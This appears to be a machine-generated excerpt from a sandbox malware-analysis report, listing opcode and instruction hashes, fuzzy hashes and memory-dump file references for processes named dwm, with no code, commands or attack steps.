                                                              • Opcode ID: 4c1fdbd151cec6eb495ed770596f0ce42c64b3a060d1fff0f6b0bd1a1324ef99
                                                              • Instruction ID: 945485279bb72fa1b08e55cc13fd5213d91b815dc98145e9d484f295657ee3c6
                                                              • Opcode Fuzzy Hash: 4c1fdbd151cec6eb495ed770596f0ce42c64b3a060d1fff0f6b0bd1a1324ef99
                                                              • Instruction Fuzzy Hash: F9E04F30A197844FC70AAB28886A9503BB0EF6B21178A40EFD449CB1B3D629DC48C712
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e91f4addccb7e7aedda89edbb4bb039b6a935c00b24033934305c43e57ec5e95
                                                              • Instruction ID: d247a3feb1871f83e2502e3a563635804e505cb7217e384cb12b3300f1bb7974
                                                              • Opcode Fuzzy Hash: e91f4addccb7e7aedda89edbb4bb039b6a935c00b24033934305c43e57ec5e95
                                                              • Instruction Fuzzy Hash: 1DE0D867F0EA0D8EF2A4D55804383BC21C1EF68710F0603BAD00EC22B2ED181D414642
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6f63c93239c0264503634fc0cc106ff43caa8969635b0bec446b1b2b4118177
                                                              • Instruction ID: f66ac2908704c89e49639b143ed33abea5ae64208aaaa59c0ad4a52d7f04a7cf
                                                              • Opcode Fuzzy Hash: c6f63c93239c0264503634fc0cc106ff43caa8969635b0bec446b1b2b4118177
                                                              • Instruction Fuzzy Hash: 75E08631A497804FC70A5A2488A98543BB0EF6B11278A40FBC005CF2B3DA2DDC89C751
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: 12906f6fa95177497d5ecbaec1be252edbea940ecbdbc9dfecc245f5e8fc43d0
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: FCD05E30B60A0D4B8B0CA62D8458430B3D2E7AA2067D45278940BC6291ED25ECC68B80
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction ID: c61fe5340826535afc364edbb8319161b8aa29362d4cd5ec83c615b501475cb2
                                                              • Opcode Fuzzy Hash: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction Fuzzy Hash: 1CD05E30B60A0D4B8B0CA62D8858430B3D1F7AA20A7A45278940BC6295ED25ECC68B81
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: eac9f3c9e8164cb1cf41174d48b875757e4d30de8a0aeb40b766ac3de036df50
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: 34E0ED30B0D61E8AFBA49144C8647A97255EBA4300F1511B8D58EA33F1DD78AF848A46
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e18066d6c0c5d5fdbddcf141f4746e22061304b2f5e423c42712523e325f5cf
                                                              • Instruction ID: c7d72724683bd5e026c53f6dbc6db57b17308231de1821026fe09fe2422fd9ac
                                                              • Opcode Fuzzy Hash: 0e18066d6c0c5d5fdbddcf141f4746e22061304b2f5e423c42712523e325f5cf
                                                              • Instruction Fuzzy Hash: 35E0173150A7884FC70BAB3488A99803FB0EE6B21578B01C7D045CF5B3EA1A8D89C762
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45f23fc92541fa3ed755ba684f60001b09e1078abf6d73c0a2eb0536067f48cc
                                                              • Instruction ID: 246205a5add23fd25976c292356efa1ea58a3354e144bf98649bf245e8bab5c7
                                                              • Opcode Fuzzy Hash: 45f23fc92541fa3ed755ba684f60001b09e1078abf6d73c0a2eb0536067f48cc
                                                              • Instruction Fuzzy Hash: E3E01A21A4F7C04FC74B973488688407F61DE5721074A45EAC085CF5B3D6199949C701
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                              • Instruction ID: 0ec8cf901b06bb288d1d8f67f6948a7a9c0b4ce16eca596bc6732798b7e6f6fe
                                                              • Opcode Fuzzy Hash: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                              • Instruction Fuzzy Hash: BCE04F7194F7C04FC70B973588B88507FA0EE2721078A45EEC085CF1F3E6198849C701
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4af934e069c0a228b869cc59da5ac456c0c4f02cf755ba926c70f7b65ed04220
                                                              • Instruction ID: 8a365ed14ec2f7f94cfbf50f45c2ff968a7aec04b37f2d32102940b7d6256faf
                                                              • Opcode Fuzzy Hash: 4af934e069c0a228b869cc59da5ac456c0c4f02cf755ba926c70f7b65ed04220
                                                              • Instruction Fuzzy Hash: 82E0EC3050A7844FC70A9B2488A99543FB0EF2621178A01EBC449CF5B3D6199888C752
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction ID: fe5d2e2e78bdc423bb53829c1512d3d9b146ac1e48e140a0f8f64f19e76b516e
                                                              • Opcode Fuzzy Hash: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction Fuzzy Hash: 35D01234B619044FC71CA63CC859CB473E1EB6A216B9541A9D00AD72B2D96ADD89C741
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction ID: caa9557b7c8fbbf9220238cbe71cdab5a5e336f9a49de818bd8e418ca5e417a5
                                                              • Opcode Fuzzy Hash: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction Fuzzy Hash: 3BD02230B649040FC70CA63C88588307390EB6A20278100A8D00BC72B1EA2ADD88C740
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              • Instruction ID: 4bfccd40ab83792f431f9a52bbf622a60a8deca77cc5ccbeec63c51004c14b89
                                                              • Opcode Fuzzy Hash: d5209af4af6651ad48c5946537454f1455eac5e26c098ada7e15179e3de32911
                                                              • Instruction Fuzzy Hash: 8C21F920B19E1D0FE79CF76D54AA67576C2EB9C312B5101B9E40EC32F6DD28DC428285
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction ID: 905fe853454272e25f0d5d5a0c418f9fdb33f45c25f3cc13fe0950c524b69a0f
                                                              • Opcode Fuzzy Hash: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction Fuzzy Hash: 2B112E2BF4C2610EE319B7BDB4764FD3790DF5113970842B7E19DC91E3ED19644A8A84
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a6ea3cefb8ca457b2338805d548966cca434a1e8a779e50d0334a80b3a5d553
                                                              • Instruction ID: 3f74525e1d43d78255200cc1ed85fd70f5737ef338ee15eb7f4728be443d22c2
                                                              • Opcode Fuzzy Hash: 1a6ea3cefb8ca457b2338805d548966cca434a1e8a779e50d0334a80b3a5d553
                                                              • Instruction Fuzzy Hash: F7211F31E19E1D9FDBA5DB48C4A07E973E1FB58311F1102BAD40DD32B1DA75AA408B80
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2f0be3a00c467420c78fa539ff329fee201b771cd99a389916bcd00bef1cb2c
                                                              • Instruction ID: 9e8c4834e2c00a00d594036911ad696ad4710021f0adb95a37692d3eae9093d3
                                                              • Opcode Fuzzy Hash: b2f0be3a00c467420c78fa539ff329fee201b771cd99a389916bcd00bef1cb2c
                                                              • Instruction Fuzzy Hash: 09118C71E08A1E8BEB24DF88DC686BD77B2FF44314F51033AD41A972A5DF782A018780
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: baa3fa1cc64cb4299503ff8c3f0a93c4a4f91fa4767db82a3bea793d04ce52a4
                                                              • Instruction ID: b136c46b3acc1f7357ce2a1006a04add714af4844bab7c48873d77718a29bd8a
                                                              • Opcode Fuzzy Hash: baa3fa1cc64cb4299503ff8c3f0a93c4a4f91fa4767db82a3bea793d04ce52a4
                                                              • Instruction Fuzzy Hash: 82019E31B0562E4BFB68C69894657F977E1EF84344F050239D40ED21E1DA28AE408F80
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d24229bf8ff7134fd2d0cf2fce4b9c1c99074224aace1fd35273c50fd14c004
                                                              • Instruction ID: ffa129d05c0d6e676efa4ed30aa00671c74b75845878af26d9f5923b6f77012e
                                                              • Opcode Fuzzy Hash: 1d24229bf8ff7134fd2d0cf2fce4b9c1c99074224aace1fd35273c50fd14c004
                                                              • Instruction Fuzzy Hash: DCF06D31B09A1E4EEB94EA9C54A67F877D1EF98312F440176E41CC32B2CE2869864B91
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction ID: da51c9fa52b7cef639a1733a7d3759ea6381a400f3ef9667fa2d7d180bcb1368
                                                              • Opcode Fuzzy Hash: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction Fuzzy Hash: BE011E60E19F1D4EE7B5A65888B47B971D1AF48702F4202B9E45EE32B2DF786E404600
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction ID: 71756f43975670f075d0df9702dd65893daffc051f65922f9c9bda5bb278888f
                                                              • Opcode Fuzzy Hash: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction Fuzzy Hash: FEF06922A0E7C55FD31A073888754687F71AE6722530B01E7C095CF0F3D9299D8AC762
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 01faf4bb102ef15a40fe28a017c915bb05845bdf3bd224aa624573ac65a7f278
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: 2E011230A19B1E8EEB38EA54D8A47F532A1FF54702F1111BDD40ED31B2EA7C2B818A00
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: b9e38a45d214338207375f53aaff6657e60c872d555f0b4c04b9511e9fa82ff3
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: ADF08935B0EB5F4BE635DA9898605BA7364EF05340B134379D41AD32F6DF38EA018680
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction ID: e84fcae9ad6c2e70ddba8a3231400df3fdd00eb8499688afd1799b603f63d25c
                                                              • Opcode Fuzzy Hash: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction Fuzzy Hash: B2F0E530B587880FC7199A2958654617BF1DF5B20534A42FFD49ACB2A3DD28AC458741
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 4b6a06b41acc23438f7dcebd3c21f45e4ab54e5599ee749a45f6da057d38525a
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: E9F03630709B1D4AE674EB44E8B4AB53391AF54701F1212B9D90ED71F3EE7C6B454504
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction ID: ed2c4dbbe90490d199d0fc8ea0ed0570fdc47263a940487e524eb35db3123ffd
                                                              • Opcode Fuzzy Hash: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction Fuzzy Hash: 6BE09230B1A7C44FCB0AAA3888684607BB1EF6720278952FFC445CB2E3D928DC89C741
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction ID: 418bc479a2730b1b89f34b398ef291d3a93538327c482a4cecd08725bfa39a09
                                                              • Opcode Fuzzy Hash: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction Fuzzy Hash: 82E04F30A197844FCB0A9B2888699503BB0EF6B21178A40EBC049CF1F3E629DC48C752
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction ID: 8ff9a74c172d593a99d19d8d17c87831a92da2d8bf39a88eb2c060635687cbe1
                                                              • Opcode Fuzzy Hash: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction Fuzzy Hash: 38E0D863F0DE0D0EF2A4D55804B43B825C1DF58762F0603BAD00EC22B2FD281D414241
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction ID: fdef9bf5e5cd33f083a5d342d4c5a74af720a8d6a8f45fec749f27a802b7c12e
                                                              • Opcode Fuzzy Hash: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction Fuzzy Hash: AAE08631A497804FC7095B2888A98543BB0DF6711278A40FBC005CF2B3D62DDC89C711
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: b61c8b3a24e5e9fe93ea92e9a5c6236a7505e948a5b4c10c68850a5d05c6efb2
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: 6DD05E30B60A0D4B8B4CA62D8458430B3D2E7AA2067D45278940BC6295ED25ECC68B80
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b790000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction ID: 1ab617b5807b60862730bf7e2eea1a76f8055e7b0ce4c2cca0b37e0c22b51329
                                                              • Opcode Fuzzy Hash: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction Fuzzy Hash: C2D05E30B60A0D4B8B4CA62D8868430B3D2F7AA2067A45278940BC6295ED25ECC68B81
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
